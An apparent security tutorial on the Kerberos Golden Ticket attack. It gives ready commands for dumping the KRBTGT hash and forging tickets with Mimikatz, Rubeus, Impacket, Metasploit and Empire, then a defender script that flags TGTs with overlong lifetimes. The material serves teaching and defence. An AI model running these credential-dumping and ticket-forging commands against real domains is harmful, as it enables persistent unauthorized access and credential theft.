A Golden Ticket attack is a post-exploitation technique in which the attacker forges a Kerberos Ticket-Granting Ticket (TGT) to gain unauthorized access to a network. It typically requires first compromising a Key Distribution Center (KDC), that is, a domain controller, in order to obtain the key of the KRBTGT account.
ATT&CK ID: T1558.001
Adversaries who have the KRBTGT account password hash may forge Kerberos ticket-granting tickets (TGTs), also known as golden tickets. Golden tickets enable adversaries to generate authentication material for any account in Active Directory.
Understanding the Golden Ticket Attack
The Golden Ticket attack abuses the trust model of the Kerberos authentication protocol, a fundamental component of Active Directory (AD) used for user authentication and authorization: every TGT is encrypted and signed with the KRBTGT account's key, so whoever holds that key can mint tickets that the KDC accepts as genuine.
By forging Kerberos tickets, an attacker (or a red teamer during an authorized engagement) gains persistent, unauthorized access to the network and can move laterally to critical systems and resources.
Requirements to forge a Golden Ticket
After an initial compromise, the attacker escalates privileges to an Administrator-level account, since extracting the KRBTGT hash requires domain-administrator rights on a domain controller. The forgery itself then needs the following information:
Info | Example | Tips
--- | --- | ---
Domain | poplabsec.rfs | |
Domain SID | S-1-5-21-3523557010-2506964455-2614950430 | Remember to remove the RID at the end of the SID |
KRBTGT NTLM / AES256 Hash | f3bc61e97fb14d18c42bcbf6c3a9055f | |
List of Tools
Tool | Git
--- | ---
MimiKatz | https://github.com/gentilkiwi/mimikatz |
Rubeus | https://github.com/GhostPack/Rubeus |
Impacket | https://github.com/SecureAuthCorp/impacket |
Metasploit | https://www.metasploit.com/ |
How to Create Golden Tickets with MimiKatz?
mimikatz kerberos::golden /domain:poplabsec.rfs /sid:<string> /user:Administrator /krbtgt:<NTLM Hash> /ptt
How to Create Golden Tickets with Rubeus?
rubeus.exe hash /user:rfs /domain:poplabsec.rfs /password:Password@1
rubeus.exe golden /aes256:EA2344691D140975946372D18949706857EB9C5F65855B0E159E54260BEB365C /ldap /user:rfs /printcmd
How to Create Golden Tickets with Impacket?
Impacket's secretsdump.py dumps the KRBTGT hash from the domain controller (the forging step then uses one of the other tools listed above):
python secretsdump.py administrator:Paa@987@192.168.1.105 -outputfile krb -user-status
How to Create Golden Tickets with Metasploit?
load kiwi
dcsync_ntlm krbtgt
golden_ticket_create -d poplabsec.rfs -u rfs -s S-1-5-21-3523557010-2506964455-2614950430 -k f3bc61e97fb14d18c42bcbf6c3a9055f -t /root/Desktop/ticket.kirbi
How to Create Golden Tickets with Empire?
usemodule credential/mimikatz/golden_ticket
set domain
set sid
set user rfs
set group
set id 500
set krbtgt_hash
Golden Tickets Time
Forged tickets are valid for 10 years by default, far beyond the 10-hour maximum TGT lifetime that Windows domain policy applies to legitimately issued tickets. Such an implausible lifetime is one of the indicators defenders can look for.
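As an added defender-side example (not part of the original page), the script below parses constructed klist-style ticket entries and flags any TGT whose lifetime exceeds the Windows default policy of 10 hours; the sample entries, principal names and helper function names are assumptions.

```python
from datetime import datetime, timedelta

# Windows default "Maximum lifetime for user ticket" (Kerberos policy) is 10 hours.
# Golden-ticket tooling typically forges TGTs with a 10-year lifetime instead.
DEFAULT_MAX_TGT_LIFETIME = timedelta(hours=10)

# Constructed sample in the style of `klist` output (not captured from a real host).
# Each line is: client principal | start time | end time | server principal
SAMPLE_KLIST = """\
rfs@POPLABSEC.RFS | 2024-03-01 08:00:00 | 2024-03-01 18:00:00 | krbtgt/POPLABSEC.RFS
Administrator@POPLABSEC.RFS | 2024-03-01 08:05:00 | 2034-02-27 08:05:00 | krbtgt/POPLABSEC.RFS
svc_backup@POPLABSEC.RFS | 2024-03-01 09:00:00 | 2024-03-01 19:00:00 | cifs/fs01.poplabsec.rfs
"""


def parse_tickets(text):
    """Parse the constructed klist-style lines into dicts with datetime fields."""
    tickets = []
    for line in text.strip().splitlines():
        client, start, end, server = (f.strip() for f in line.split("|"))
        tickets.append({
            "client": client,
            "start": datetime.strptime(start, "%Y-%m-%d %H:%M:%S"),
            "end": datetime.strptime(end, "%Y-%m-%d %H:%M:%S"),
            "server": server,
        })
    return tickets


def flag_long_lived_tgts(tickets, max_lifetime=DEFAULT_MAX_TGT_LIFETIME):
    """Return the clients of TGTs (server krbtgt/...) whose lifetime exceeds policy.

    A legitimate KDC clamps the end time to the domain policy, so a TGT that
    outlives it was not issued by the KDC and warrants investigation.
    """
    flagged = []
    for t in tickets:
        if not t["server"].lower().startswith("krbtgt/"):
            continue  # service tickets are governed by a separate policy value
        if t["end"] - t["start"] > max_lifetime:
            flagged.append(t["client"])
    return flagged


if __name__ == "__main__":
    for client in flag_long_lived_tgts(parse_tickets(SAMPLE_KLIST)):
        print(f"suspicious TGT lifetime for {client}")
```

Flagging the ticket is only the detection half: because the forged ticket is protected with the KRBTGT key, it remains usable until the KRBTGT password has been reset twice, since the KDC also honours the previous key.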